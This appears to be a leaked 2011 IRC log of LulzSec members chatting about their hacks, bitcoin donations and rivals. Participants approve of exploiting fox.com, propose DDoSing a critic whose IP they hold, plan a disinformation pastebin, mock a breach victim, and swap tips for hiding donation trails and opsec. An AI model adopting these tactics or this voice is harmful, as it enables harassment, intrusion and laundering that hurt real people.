07:59:44tflowscript*Jun 04 08:00:13joepie91idkJun 04 08:00:16joepie91he's learning javascriptJun 04 08:00:21joepie91"from a book" apparentlyJun 04 08:00:31joepie91which is typically a horrible idea with a language like javascriptJun 04 08:00:41joepie91because standards can change quite a lot over a short timespanJun 04 08:00:54joepie91ohwell.Jun 04 08:01:01joepie91he's now apparently going to follow the w3schools guideJun 04 08:01:04joepie91instead of the bookJun 04 08:01:06joepie91so all will be fineJun 04 08:01:56joepie91whooJun 04 08:02:03joepie91just found a really clever bit on a forumJun 04 08:02:05joepie91"After uninstalling Firefox 3 times, I finally figured out a way to get rid of Norton. In the Mozilla Firefox components folder there is a file called: coFFPlgn.dll. I overwrote the coFFPlgn.dll with a blank file and then set it to read only. That got rid of the Norton Firefox Tool Bar."Jun 04 08:02:47tflowthat's how i got rid of license scripts on php scriptsJun 04 08:03:43tflowsomeone payed me $20 to overwrite a file with blank data onceJun 04 08:03:47joepie91lololJun 04 08:04:09joepie91also, just sayingJun 04 08:04:18joepie91http://blockexplorer.com/address/176LRX4WRWD5LWDMbhr94ptb2MW9varCZPJun 04 08:04:29joepie91you could probably write a nice small donation counter using that :)Jun 04 08:22:35joepie91http://pastebin.com/rrZDkbp7Jun 04 08:22:44joepie91Avunit Sabu tflow lol TopiaryJun 04 08:22:46joepie91read pastebinJun 04 08:24:18Topiarysee, now that's the entire HBGary crewJun 04 08:24:21Topiaryso why is your name in it?Jun 04 08:25:46joepie91probably because I was in the leaked logs?Jun 04 08:25:53joepie91anyway, is entropy still here under some nick?Jun 04 08:25:58TopiarynopeJun 04 08:26:10joepie91also, it was tweeted by AwineeJun 04 08:26:12joepie91a few minutes agoJun 04 08:26:16Topiarylet's just ignore itJun 04 08:26:21Topiarybeen ignoring them all for daysJun 04 08:26:22joepie91so I think he just grepped the #hq logs thenJun 04 08:26:38Topiaryit's fine if we just stay here and don't expose ourselves in other locationsJun 04 08:26:41Topiarythey can't do anythingJun 04 08:27:15*	trollpoll (rootgratz@HA-fdp.dgc.42rdv5.IP) has joined #pure-eliteJun 04 08:27:18lolwe should do a mass disinfo campaingn :D?Jun 04 08:27:19Topiary'sides this is Pure Elite not LulzSec, heh luckily our gang of awesome development folks working in side-ops didn't get on that listJun 04 08:27:28joepie91lolJun 04 08:28:07lollets add the lulzsec.com domain adrian lamo owns and awiness dox and some other jesterfags to a pastebin and call it "lulzsec members" then pastebin spam it so it trends like pr0's :D?Jun 04 08:28:16trollpolllol, i was thinking just on thisJun 04 08:28:20lolor you think doing tht will give them more reason to think it is us?Jun 04 08:28:22trollpollbut, saying more or lessJun 04 08:28:26trollpollthat lulzsec is CIAJun 04 08:28:31Topiaryhmm not sure who IS LulzSec really... tflow/Sabu/myself/kayla started it, then tflow was on/off, then Avunit/pwnsauce joined in, then you guys came onboard... :D I guess nobody and everybodyJun 04 08:29:14Topiarylet's spread disinfo about CIA I guessJun 04 08:29:28tflowyeah but props to trollpoll for exploiting that fox.com holeJun 04 08:29:30trollpollit makes senseJun 04 08:29:34Topiaryoh definitely yeahJun 04 08:29:41Topiarywe have trollpoll to thank for the first hitJun 04 08:29:49Topiaryvery good shitJun 04 08:30:05trollpollnot all mine...Jun 04 08:30:14Topiaryword is that you exploited it up nicelyJun 04 08:30:37trollpollbut i lost the lulz :(Jun 04 08:30:55Topiary"awinee AwineeJun 04 08:30:55TopiaryI'll dedicate this day to @avunitanon. @LulzSec watch closely as I sink your humble boat. Nothing personal, just #lulz. Read next tweet.Jun 04 08:30:55Topiary"Jun 04 08:30:57Topiary2 minutes agoJun 04 08:30:58*	Topiary watchesJun 04 08:31:19joepie91well shitJun 04 08:31:21joepie91I have to get breadJun 04 08:31:25joepie91but I dun want to miss the lulzJun 04 08:31:25joepie91:(Jun 04 08:31:49TopiaryAwinee has no fucking idea what the word "humble" meansJun 04 08:32:16joepie91maybe you should tell him about the humble bundleJun 04 08:32:20Topiaryhe's not charismatic, he's not skilled, he's not funny, he's not smart, he's ugly and out of shape, and he wakes up at 2 in the afternoon every dayJun 04 08:32:22joepie91for further confuse :DJun 04 08:32:22*	Topiary shakes headJun 04 08:32:23Topiarypoor boyJun 04 08:33:55trollpollTopiary, about CIA, will make sense to ppl, cos in fact makes sense to meJun 04 08:34:18trollpollas far as i know, one of you could be some CIA guyJun 04 08:34:36Topiaryit's trueJun 04 08:34:36trollpollusing "hackers" to their benefitsJun 04 08:34:48trollpollattacking iranJun 04 08:34:57trollpolllybiaJun 04 08:35:00trollpollor whateverJun 04 08:35:04trollpollis CIA styleJun 04 08:35:17trollpollalso, makes the hackers thing they are freelance :)Jun 04 08:35:39trollpollbut ey, if one of you is a cia guy... cmon, no problem, we are for lulz xDJun 04 08:35:52Topiaryif I were CIA I'd certainly be looking for a crew like thisJun 04 08:36:03trollpollsureJun 04 08:36:05Topiaryseriously if you gave us all a schedule, office building, and paychequesJun 04 08:36:09Topiarywe'd just destroy the worldJun 04 08:36:36trollpollwell, in a not far future, perhaps we will end at it...Jun 04 08:36:57TopiaryheheJun 04 08:37:00trollpolli mean... the whitehat security companies started like this...Jun 04 08:37:26Topiarydon't even know why I've got a tab open on @Awinee and his twitter feed, here comes the failed d0x...Jun 04 08:38:18TopiaryI really hope one of you is awinee so everyone can have something fun to readJun 04 08:38:25Topiarymaybe Gawker will go over our logs and make a lame storyJun 04 08:39:05tflowgawker is a jokeJun 04 08:39:18tflowtheir design made them lose alot of their visitorsJun 04 08:39:19Topiarytflow: did you see Chen's tweet about us being HBGay crew?Jun 04 08:39:25tflowcompletely dropped them out of google newsJun 04 08:39:25tflowyeahJun 04 08:41:48tflowwe could just ddos himJun 04 08:41:51tflowwe have his ipJun 04 09:01:22tflowi love this guyJun 04 09:01:23tflowhttp://www.youtube.com/watch?v=59Wm00Q6s7cJun 04 09:02:09tflowthe same guy like 5 years later: http://www.youtube.com/watch?v=G5v0kwXapt0Jun 04 09:21:53*	tflow has quit (A TLS packet with unexpected length was received.)Jun 04 09:22:14*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 04 09:35:47joepie91Clever (Score:1)Jun 04 09:35:47joepie91by asto21 (1797450)Jun 04 09:35:47joepie91Take a site down first and then make sure it stays down by slashdotting it.Jun 04 09:35:50joepie91lololJun 04 09:37:10tflowwhere's that?Jun 04 09:38:06joepie91slashdotJun 04 09:38:08joepie91it's frontpageJun 04 09:38:10joepie91right nowJun 04 09:38:14joepie91like, top articleJun 04 09:38:22tflowah lolJun 04 09:38:24joepie91also, either slashdot and boingboing are having issuesJun 04 09:38:28joepie91or I am getting ddos _again_Jun 04 09:39:00&lt;hsien&gt;	yoJun 04 09:39:19*	hsien gives channel operator status to joepie91 lol tflow storm Topiary trollpollJun 04 09:39:47joepie91my laptop doesn't get +o? :(Jun 04 09:39:55joepie91:PJun 04 09:39:56Topiaryyour laptop is a terroristJun 04 09:40:04joepie91terrorists don't run on Pentium 3sJun 04 09:40:20*	joepie91 gives channel operator status to joepie91_laptopJun 04 09:42:55joepie91soJun 04 09:43:05joepie91VPNJun 04 09:43:09joepie91recommendations?Jun 04 09:43:10joepie91inb4 HMAJun 04 09:43:13TopiaryHMAJun 04 09:44:00joepie91lolJun 04 09:44:04joepie91what are the speeds on HMA?Jun 04 09:44:20joepie91like, will I be able to burst the full 1,8MB/sec of my connection?Jun 04 09:45:10TopiaryI believe you'll manageJun 04 09:45:21Topiaryalso, I just got a 32GB MicroSD for Â£40Jun 04 09:45:51Topiaryfirst I thought it would totally be a scam and would be one of those shitty 1GBsJun 04 09:45:53Topiaryjust plugged it inJun 04 09:45:57Topiary29.7GB :DJun 04 09:46:05joepie91microsd isn't very expensiveJun 04 09:46:07joepie91but TopiaryJun 04 09:46:10joepie91what kind of speeds do you get?Jun 04 09:46:13*	lol has quit (Ping timeout: 121 seconds)Jun 04 09:46:27TopiaryI'm running on 4mbps here and it maxes thatJun 04 09:46:36joepie91mmmJun 04 09:46:40joepie91ohJun 04 09:46:42joepie91fuckJun 04 09:46:43joepie91liberty reserveJun 04 09:46:44joepie91is shittyJun 04 09:46:46joepie91beyond beliefJun 04 09:47:22TopiaryAccount Balance is: 25.09 BTC (429.04 USD @ 17.10)Jun 04 09:47:23Topiaryu jelly?Jun 04 09:47:49joepie91http://bitpoll.dyndns.org/?poll=3Jun 04 09:47:50joepie91u jelly?Jun 04 09:48:21joepie91and no I don't have all those bitcoins anymore :PJun 04 09:48:33*	lol (lol@HA-q3c.mcg.9puaba.IP) has joined #pure-eliteJun 04 09:48:46tflowi bet you wish you kept themJun 04 09:48:49TopiaryI sent you 0.3Jun 04 09:48:52Topiaryon tflow's /r/Jun 04 09:49:11joepie91tflow: yes, but I had bills to payJun 04 09:49:12joepie91sadlyJun 04 09:49:18joepie91Topiary: :DJun 04 09:49:23*	joepie91 tries to find transactionJun 04 09:49:37Topiary2011-06-03 15:11:17	coingobbler	1PPVupRRz7tH...	-0.30Jun 04 09:49:37joepie9117:24 yesterdayJun 04 09:49:39joepie91(my time)Jun 04 09:49:49Topiaryour biggest single donation:Jun 04 09:49:50joepie91oh lolwutJun 04 09:49:50Topiary2011-06-04 05:19:14	Bitcoin P2P Network	coingobbler	13.40Jun 04 09:49:52joepie91time differenceJun 04 09:49:55joepie91and wut datJun 04 09:50:01tflowIf I kept that 25 bc you gave me 2 months ago, I'd be like $300 richerJun 04 09:50:05Topiarysomeone sent us 150USD in one donationJun 04 09:50:06joepie91lolJun 04 09:50:11joepie91lolwatJun 04 09:50:15joepie91niceJun 04 09:50:20Topiarytime to spam your assesJun 04 09:50:21Topiary2011-06-04 13:40:07	Bitcoin P2P Network	coingobbler	0.05Jun 04 09:50:21Topiary2011-06-04 12:38:23	Bitcoin P2P Network	coingobbler	0.52Jun 04 09:50:21Topiary2011-06-04 05:19:14	Bitcoin P2P Network	coingobbler	13.40Jun 04 09:50:21Topiary2011-06-04 04:16:58	Bitcoin P2P Network	coingobbler	0.01Jun 04 09:50:21Topiary2011-06-04 02:19:00	Bitcoin P2P Network	coingobbler	1.90Jun 04 09:50:22Topiary2011-06-04 01:15:16	Bitcoin P2P Network	coingobbler	1.00Jun 04 09:50:24Topiary2011-06-03 18:03:53	Bitcoin P2P Network	coingobbler	0.99Jun 04 09:50:26Topiary2011-06-03 15:11:17	coingobbler	1PPVupRRz7tH...	-0.30Jun 04 09:50:28Topiary2011-06-03 10:49:24	Bitcoin P2P Network	coingobbler	2.01Jun 04 09:50:30Topiary2011-06-03 08:50:34	Bitcoin P2P Network	coingobbler	0.02Jun 04 09:50:32Topiary2011-06-03 07:51:23	Bitcoin P2P Network	coingobbler	1.00Jun 04 09:50:34Topiary2011-06-03 05:57:29	Bitcoin P2P Network	coingobbler	0.06Jun 04 09:50:38Topiary2011-06-03 05:02:08	Bitcoin P2P Network	coingobbler	0.55Jun 04 09:50:39joepie91just curious... why are you using a web wallet?Jun 04 09:50:40Topiary2011-06-03 03:02:08	Bitcoin P2P Network	coingobbler	0.01Jun 04 09:50:42Topiary2011-06-03 02:06:34	Bitcoin P2P Network	coingobbler	0.12Jun 04 09:50:44Topiary2011-06-02 22:13:15	Bitcoin P2P Network	coingobbler	3.26Jun 04 09:50:46Topiary2011-06-02 22:13:14	Bitcoin P2P Network	coingobbler	0.04Jun 04 09:50:48Topiary2011-05-31 04:11:41	Bitcoin P2P Network	CoinGobbler	0.05Jun 04 09:50:50Topiary2011-05-31 02:46:10	Bitcoin P2P Network	CoinGobbler	0.03Jun 04 09:50:52Topiary2011-05-30 23:22:21	Bitcoin P2P Network	CoinGobbler	0.02Jun 04 09:50:54Topiary2011-05-28 22:34:45	Bitcoin P2P Network	CoinGobbler	0.05Jun 04 09:50:56Topiary2011-05-28 22:06:44	1NFEkB8NYkLS...	CoinGobbler	0.26Jun 04 09:50:58Topiary2011-05-13 19:30:28	Bitcoin P2P Network	CoinGobbler	0.02Jun 04 09:51:00Topiary2011-05-04 04:43:20	Bitcoin P2P Network	CoinGobbler	0.02Jun 04 09:51:02Topiaryom nom nom nom goinsJun 04 09:51:04Topiarybecause client = IPJun 04 09:51:09joepie91trueJun 04 09:51:17joepie91butJun 04 09:51:18TopiaryI don't buy anything with this walletJun 04 09:51:21joepie91that doesn't make it traceableJun 04 09:51:21joepie91afaikJun 04 09:51:25Topiaryif we need to buy things, I shift it to someone elseJun 04 09:51:41joepie91everyone "has" the coins, but you can only "use" them if you have the private key of the addressJun 04 09:51:58joepie91so you can't see "oh this transaction went to IP X"Jun 04 09:52:12joepie91it's like you have the key, and noone knows you doJun 04 09:52:15joepie91someone makes a chest with moneyJun 04 09:52:21joepie91gives everyone a copy of that chestJun 04 09:52:26joepie91but you are the only one who can open the chest as you have the keyJun 04 09:52:37joepie91however, noone knows you have the key, nor that you opened the chestJun 04 09:53:08joepie91at least that is my understanding of how it works :PJun 04 09:54:47joepie91goddamnitJun 04 09:54:48joepie91http://members.shaw.ca/gf3/circle-the-cat.htmlJun 04 09:56:42tflowi remember playing that a few years agoJun 04 09:56:55Avuniti has itJun 04 09:56:57AvunitfinallyJun 04 09:56:59*	tflow has quit (A TLS packet with unexpected length was received.)Jun 04 09:56:59Avunitbitch cat D:Jun 04 09:57:04joepie91lololJun 04 09:57:10joepie91Avunit: you won?Jun 04 09:57:14AvunityeshJun 04 09:57:20*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 04 09:57:27Avunitafter 6 tries D:Jun 04 09:57:35joepie91jesusJun 04 09:57:36joepie91you're goodJun 04 09:57:48AvunitwellJun 04 09:57:50Avuniti failed hard again nowJun 04 09:58:21Avunitargh so close now :(Jun 04 09:58:45Avunitah got it againJun 04 09:59:18joepie91lolwatJun 04 09:59:19joepie91you are goodJun 04 09:59:41Avunitimma upload picJun 04 09:59:42AvunitsecsJun 04 09:59:53Avunitbefore i ensnare itJun 04 10:00:36Avunithttp://i.imgur.com/NrQWr.jpgJun 04 10:00:46Avunitgotta use those green dots you start out withJun 04 10:01:39joepie91FUCKING CATJun 04 10:01:40joepie91I knowJun 04 10:01:51joepie91but I can't win itJun 04 10:01:51joepie91D:Jun 04 10:01:57AvunitlolwatJun 04 10:02:02Avunitonly 3 darkgreen dots naoJun 04 10:02:06joepie91I tried like 20 timesJun 04 10:02:08joepie91couldn't winJun 04 10:02:09Avunitthe challenge is accepted D:Jun 04 10:02:09joepie91I sad nao :(Jun 04 10:02:13joepie91and lolJun 04 10:02:23Avunitwut its not running away from my cricleJun 04 10:02:25Avunitin previous triesJun 04 10:02:30Avunitit like ran the opposite directionJun 04 10:02:37Avunitof where id put the first circleJun 04 10:02:38joepie91alsoJun 04 10:02:38joepie91http://pete.com/files/photos/challenge-denied.jpgJun 04 10:02:43Avunitso id drive im to the nearest clusterJun 04 10:02:46Avunitnow it just ran past it D:Jun 04 10:02:48joepie91lolJun 04 10:02:51joepie91but look at that imageJun 04 10:03:04AvunitACCEPTEDJun 04 10:04:17joepie91http://pete.com/view/during-a-blackoutJun 04 10:05:29AvunithahaJun 04 10:07:44joepie91you knowJun 04 10:07:50joepie91people are seriously supportive of lulzsec it seemsJun 04 10:07:53joepie91likeJun 04 10:07:59joepie91they somehow seem to support lulzsec more than anonymousJun 04 10:08:12lollolJun 04 10:08:12joepie91which isJun 04 10:08:14joepie91interestingJun 04 10:08:18joepie91seeing as the most heard argument wasJun 04 10:08:23joepie91BUT THEY ARE COMMITTING CRIMES!!1!Jun 04 10:08:29Avunityeah but it is mainly because we dont really use any shitty motives n stuff its just lulz and i meanJun 04 10:08:31Avuniteveryone had to laughJun 04 10:08:35Avunitwhen tupac was ressurectedJun 04 10:08:49trollpolllolJun 04 10:08:51joepie91yes, but the "it's a crime" argument goes here as wellJun 04 10:08:59joepie91so it would make no sense to judge anon based on that argumentJun 04 10:08:59Avunityeah but everyone found it funny :pJun 04 10:09:03joepie91if you don't do the same for lulzsecJun 04 10:09:04joepie91:pJun 04 10:09:14joepie91tl;dr people are hypocritical and have double standardsJun 04 10:09:15joepie91what's newJun 04 10:09:26Avunitthat is from an objective, non brain interferance point of viewJun 04 10:09:45joepie91@ekgibsonJun 04 10:09:45joepie91Emily GibsonJun 04 10:09:45joepie91@LulzSec You proved your point, but did you have to publish everything? Thanks for fucking my day. Fb, amazon,everything hacked. Kiss my assJun 04 10:09:46joepie91lolJun 04 10:09:52joepie91shouldnthavereusedpasswords.jpegJun 04 10:10:02lollolJun 04 10:10:04lol:DJun 04 10:10:10Avunittis just like saying you dont discriminate but scientifically its proven that one simply looks at some things like colour, weight, build etc. first :PJun 04 10:10:12lolshould make tht an actual image xDJun 04 10:10:39joepie91lolJun 04 10:10:58joepie91Avunit: humans aren't perfect.. but if you are aware of that...Jun 04 10:11:03joepie91then don't claim you areJun 04 10:11:06joepie91as inJun 04 10:11:23joepie91if you like what lulzsec does, but not what anon does, then don't use the "it's a crime" argument at allJun 04 10:11:44joepie91on another note, lulzsec has turned quite some attention to cloudflare and bitcoin it seems :pJun 04 10:11:47AvunitMost people are not aware or dont want to be :/ Which is not necessarily badJun 04 10:11:59Avunitand awinee is promoting avunit.com! :OJun 04 10:12:08AvunitSo i knowJun 04 10:12:11Avunitwe save moneyJun 04 10:12:21Avunitand then we make a tv commercial with shouldnthavereusedpassword.jpeg to inform the public! :DJun 04 10:13:40joepie91lolJun 04 10:14:03joepie91godJun 04 10:14:09joepie91gawker couldnt possible have made a worse picture mashupJun 04 10:14:11joepie91for their articleJun 04 10:14:13joepie91http://gawker.com/5808517/lulzsec-hackers-go-after-fbi-affiliates?utm_source=twitterfeed&amp;utm_medium=twitterJun 04 10:17:37Topiarywow that's hideousJun 04 10:20:55joepie91yaJun 04 10:20:56joepie91it isJun 04 10:29:15sabuyoJun 04 10:37:18*	trollpoll has quit (A TLS packet with unexpected length was received.)Jun 04 10:39:38*	t[2] (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-eliteJun 04 10:43:14*	Topiary has quit (Ping timeout: 121 seconds)Jun 04 10:43:17*	t[2] is now known as TopiaryJun 04 10:43:36*	Topiary has quit (Quit: TANGO OSCAR PAPA INDIA ALPHA ROMEO YANKEE TACTICAL BARREL ROLL)Jun 04 10:43:43*	Topiary (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-eliteJun 04 10:50:05*	Topiary has quit (Quit: sec)Jun 04 10:50:52*	Topiary (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-eliteJun 04 11:08:57joepie91TopiaryJun 04 11:08:58joepie91you here?Jun 04 11:10:50TopiaryyeahJun 04 11:11:31joepie91can you generate a new bitcoin address?\Jun 04 11:11:34joepie91someone wants to donateJun 04 11:11:39joepie91but doesn't want his transaction to show upJun 04 11:11:42joepie91on the "normal" addressJun 04 11:11:43sabutrueeeeeJun 04 11:11:53Topiaryjoepie91: can you take the donation and then forward it to me?Jun 04 11:11:56joepie91idk if the wallet you use allows multiple addressesJun 04 11:11:57joepie91and yesJun 04 11:12:03joepie91but it will still be sort of traceableJun 04 11:12:12joepie91there's just an extra hopJun 04 11:12:15TopiaryI don't want to change my one as it's on like 150K viewing pastebinsJun 04 11:12:19joepie91nonoJun 04 11:12:21joepie91just make an extra oneJun 04 11:12:25joepie91just for this transactionJun 04 11:12:27Topiarydon't think you can do thatJun 04 11:12:28joepie91idk if your wallet allows itJun 04 11:12:35Topiaryhmm nopeJun 04 11:12:39joepie91in the normal client you can.. in fact it's recommended to make a new address for every transactionJun 04 11:12:40Topiaryhow much is he donating?Jun 04 11:12:40tflowwhy not just use the bitcoin client?Jun 04 11:12:41joepie91well derpJun 04 11:12:42joepie91idkJun 04 11:13:04Topiaryokay well get him to donate to you, then you send to tflow, then tflow send to the lulzsec addressJun 04 11:13:04tflowi can make one on the bitcoin client if you wantJun 04 11:13:08tflowokJun 04 11:13:20tflowbut if i send to lulzsec addressJun 04 11:13:26tflowit will be traced back to himJun 04 11:13:33joepie91don't send to lulzsec addressJun 04 11:13:36joepie91keep it apartJun 04 11:13:54Topiaryokay sure thenJun 04 11:13:58Topiarywhatever he wantsJun 04 11:14:06Topiaryif it's 0.01 I will raegJun 04 11:14:36joepie91lolJun 04 11:14:44joepie91I don't think it will be 0.01 :PJun 04 11:14:56tflow1F7Y5uktm2DofQfMBLfL6cg2TWDmuTkZKUJun 04 11:16:12joepie91okayJun 04 11:16:14joepie911 secJun 04 11:16:27joepie91I will probably leave a delay in sending itJun 04 11:16:32joepie91so that he can send it to the anonnews addressJun 04 11:16:41joepie91and 1 or 2 days later I can forward it plus a little bit extra to that addressJun 04 11:16:48joepie91so that it looks as if I just wanted to "share the wealth"Jun 04 11:16:49joepie91etc etcJun 04 11:17:09tflowor why not send directly?Jun 04 11:17:21Topiaryif you're gonna wait 1-2 days, might as well send directly to lulzsecJun 04 11:17:30joepie91because he doesn't want to be openly linked with lulzsecJun 04 11:17:40tflowbut it's a new addressJun 04 11:17:56joepie91yes, but that will only work if you keep it completely separateJun 04 11:18:04tflowwe willJun 04 11:18:07Topiarywe do that anywayJun 04 11:18:10joepie91so don't forward the btc from your address to the lulzsec addressJun 04 11:18:14joepie91don't combine paymentsJun 04 11:18:14joepie91etcJun 04 11:18:15tflowokJun 04 11:18:15Topiarywhenever we buy anything, I transfer from the main hash to side-hashesJun 04 11:18:43tflowthat can still be tracedJun 04 11:18:53joepie91goddamnJun 04 11:18:53joepie911 secJun 04 11:21:08joepie91mkJun 04 11:21:11joepie91now someone elseJun 04 11:21:17joepie91is merging into the conversationJun 04 11:21:22joepie91discouraging him from donating etc etcJun 04 11:21:24joepie91wtf -_-Jun 04 11:21:28tflowlolJun 04 11:21:32tflowwhere is this happenning?Jun 04 11:21:37tflowhappening*Jun 04 11:21:42joepie91an irc channelJun 04 11:22:11tflowjust becareful not to link yourself to lulzsecJun 04 11:23:19Topiarytell him to grow some balls and donate to the main hash like everyone elseJun 04 11:23:27Topiaryand then tell him to get a new address on his endJun 04 11:23:32Topiaryand donate the rest to that oneJun 04 11:24:02joepie91no srsly, he can't just directly donate itJun 04 11:24:13Topiarywhy not?Jun 04 11:24:15tflowa good way to seperate bc addresses it to convert it to mt gox, then convert it backto bcJun 04 11:24:20joepie91pmJun 04 11:34:49stormhoJun 04 11:34:51stormhiJun 04 11:35:01*	storm gives channel operator status to lol TopiaryJun 04 12:00:51joepie91- - jews.irc.lulzco.org Message of the Day -Jun 04 12:00:51joepie91- Welcome to irc.encyclopediadramatica.chJun 04 12:00:51joepie91eh.Jun 04 12:07:32Topiaryjoepie91 how is that thing going?Jun 04 12:07:55joepie91idkJun 04 12:07:59joepie91haven't gotten a response anymore :/Jun 04 12:08:07joepie91I'll wait for a bit until he respondsJun 04 12:11:29joepie91goddamnitJun 04 12:11:33joepie91&gt;read inboxJun 04 12:11:35joepie91&gt;spamspamspamspamspamJun 04 12:14:37*	neuron (neuron@HA-a12.345.a84vd3.IP) has joined #pure-eliteJun 04 12:14:47neurono/ morning everyoneJun 04 12:14:54lolhi neuron :DJun 04 12:15:07neuronwhats everyone up to/Jun 04 12:17:22neuronwhats this irc on twitter?Jun 04 12:19:40*	joepie91 facepalmsJun 04 12:19:41joepie91http://www.foxbusiness.com/on-air/stossel/blog/2011/06/02/digital-currency-libertarian-future-0Jun 04 12:19:44joepie91&gt;bitcoinJun 04 12:19:47joepie91&gt;libertarianJun 04 12:19:56joepie91&gt;assigning a political color to everything "different" that occursJun 04 12:20:03joepie91neuron: it's the ED IRC I believeJun 04 12:20:38neuronED?Jun 04 12:22:13neuronlol: you there?Jun 04 12:24:18sabusexJun 04 12:24:26sabujoepieJun 04 12:24:28neuronhey Sabu o/Jun 04 12:24:35TopiaryAccount Balance is: 26.100001 BTC (449.44 USD @ 17.22)Jun 04 12:24:38TopiaryFFFFFUUUU someone sent us 0.000001Jun 04 12:24:41sabuit was the ed irc, hes changing whole network to lulzco netJun 04 12:24:45sabuhahahahhah ytou serious?Jun 04 12:24:51sabuthats awesomeJun 04 12:24:55lolxDJun 04 12:25:05lolneuron: yeh :D?Jun 04 12:25:06sabuwait what the FUCK bitcoins are at 17 dollars?????????????????????????Jun 04 12:25:13neuronAWW YEAHJun 04 12:25:14Topiaryyeah we have 450USD LOLJun 04 12:25:15Topiaryin donationsJun 04 12:25:16neuronthey keep going upJun 04 12:25:20sabutopiary are we going to start buying servers?Jun 04 12:25:20lolyeh they're going up all the time :DJun 04 12:25:21sabuand vpns?Jun 04 12:25:25sabuor are we gonna sit on itJun 04 12:25:29neuroni say buy nowJun 04 12:25:35neuronits gonna go down soonJun 04 12:25:42Topiaryjoepie says it's gonna go up soonJun 04 12:25:47Topiarylike at least to 20Jun 04 12:25:50neuron:EJun 04 12:25:53sabutopiary generate me a new donation key so I put on topic of lulzsec chan on lulzco networkJun 04 12:26:05Topiarylet's just use the same one broJun 04 12:26:26sabuim lazy loJun 04 12:26:27*	neuron will be in that lulzco channel has BlackBeardJun 04 12:26:28sabuwhich one is it?Jun 04 12:26:30TopiarysecJun 04 12:26:33sabuneuronJun 04 12:26:38saburemember what happened with 2600Jun 04 12:26:46neuronI didn't have  aproblem in 2600Jun 04 12:26:47sabuyou got to be on point if I op youJun 04 12:26:48Topiaryhttp://lulzsecurity.com/donate/Jun 04 12:26:52Topiaryjust put this in the topicJun 04 12:26:54Topiary&lt;3Jun 04 12:26:57neuronI will beJun 04 12:27:04TopiarySabu: want me to head over?Jun 04 12:29:52neuronSabu: Ill be carefulJun 04 12:31:38joepie91it's best to sit on bitcoins as long as possibleJun 04 12:31:39joepie91imoJun 04 12:31:48joepie91they are pretty much guaranteed to go further upJun 04 12:31:51joepie91in the futureJun 04 12:31:53loluntill they hatch! :)Jun 04 12:32:06joepie91it's pretty much a deflationary currency, not inflationaryJun 04 12:32:29joepie91butbutbutJun 04 12:32:31joepie91gotta go somewhereJun 04 12:32:33joepie91for a secJun 04 12:33:04sabuguysJun 04 12:33:13sabuif you head over we have much more ocntrol than on 2600Jun 04 12:33:18sabuso use your pseudonymsJun 04 12:33:29sabuand lol @ faggotry on hereJun 04 12:33:40saburegister your nicks and tell me themJun 04 12:33:49tflowbottle_of_rumJun 04 12:33:59neuronRegisteered BlackBeardJun 04 12:37:14joepie91Sabu: isn't it Ryans IRC...?Jun 04 12:39:18sabu08:37 &lt;lulzsupport&gt; dude check this :) http://www.megaupload.com/?d=0H302G70Jun 04 12:39:19sabu08:37 &lt;lulzsupport&gt; but do not spread use for your purposes ;)Jun 04 12:39:24sabucheck whats about?Jun 04 12:39:37neuronmn ?Jun 04 12:39:49sabu08:38 &lt;lulzsupport&gt; [was to give it to captainjack yesterday but i lost him so i didn't have the time to give him the stuff]:)Jun 04 12:39:52sabu08:38 &lt;lulzsupport&gt; nope friend but wanna help ;)Jun 04 12:39:53sabuon your vmJun 04 12:39:55sabu08:38 &lt;lulzsupport&gt; check and you say me :)Jun 04 12:39:56sabudownload that megaupoadJun 04 12:39:59sabu08:38 &lt;lulzsupport&gt; [the directory issue] its for mantech.com :)Jun 04 12:40:01sabuneuronJun 04 12:40:02neuronRgrJun 04 12:40:04sabusee wtf is in itJun 04 12:40:42lolbecarefull, if it's pdf's or things like thtJun 04 12:40:52lolopen it on a virtual machineJun 04 12:41:00neuronYeahJun 04 12:41:11lolincase it exploits your pdf viwer or w/e filetype it isJun 04 12:41:35sabuyeahJun 04 12:41:38sabuneuron be on pointJun 04 12:41:47sabumake sure your vm is behind vpn etcJun 04 12:41:50sabuso your ip isnt exposedJun 04 12:43:48lolDont mention nothing private in PM eitherJun 04 12:43:52lolto no oneJun 04 12:43:56lolnot even our membersJun 04 12:43:56sabuguysJun 04 12:43:58sabueveryoneJun 04 12:44:00sabutalk hereJun 04 12:44:01loljust incase PM's are loggedJun 04 12:44:04sabuyupJun 04 12:44:08joepie91is it Ryans IRC or not?Jun 04 12:44:10sabuI'm there already establishedJun 04 12:44:16sabuJOEPIE YES IT IS ED IRC NETWORKJun 04 12:44:21sabuHE CHANGED IT TO LULZCO NETWORKJun 04 12:44:24neuronXDJun 04 12:44:26joepie91ahJun 04 12:44:27joepie91thereJun 04 12:44:29sabuokJun 04 12:44:30neuronSabu: im there just waiting for opsJun 04 12:44:30joepie91that was what I was wondering about.Jun 04 12:44:31joepie91lolJun 04 12:44:34sabulolJun 04 12:44:35sabuokJun 04 12:44:38sabubefore I start opping etcJun 04 12:44:38*	pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has joined #pure-eliteJun 04 12:44:42sabumake sure you guys are on pointJun 04 12:44:44neurono/ pwnsauceJun 04 12:44:44lolpwnsauce :DJun 04 12:44:48sabuif you get any docs / links in pmJun 04 12:44:50sabupaste hereJun 04 12:44:55sabuwe'll anallyze togetherJun 04 12:44:58pwnsauceYoJun 04 12:45:00sabuno answering questions at allJun 04 12:45:03pwnsaucewhats happening?Jun 04 12:45:05sabuno drama dont get trolledJun 04 12:45:06sabupwnsauce nothingJun 04 12:45:07sabujust boredJun 04 12:45:08sabuyou?Jun 04 12:45:13pwnsauceJust got onlineJun 04 12:45:16pwnsaucegot some ideadJun 04 12:45:19pwnsauce*ideasJun 04 12:45:33joepie91if someone feels like trolling Awinee some more, here is an excellent opportunityJun 04 12:45:34joepie91&lt;awinee&gt;asie, I wouldn't wanna hack CP sites.Jun 04 12:45:34joepie91&lt;awinee&gt;just ddos themJun 04 12:45:34joepie91&lt;asie&gt;Awinee why not?Jun 04 12:45:34joepie91&lt;awinee&gt;hacking them would involve possibly seeing the picturesJun 04 12:45:52neuronlolJun 04 12:46:04pwnsaucelolJun 04 12:46:12sabuHAHAJun 04 12:46:17joepie91you know what they say about extreme denial.. .:DJun 04 12:46:22sabuok who is on here now ?Jun 04 12:46:28sabuthe lulzco serverJun 04 12:47:09neurono/ Has BlackBeardJun 04 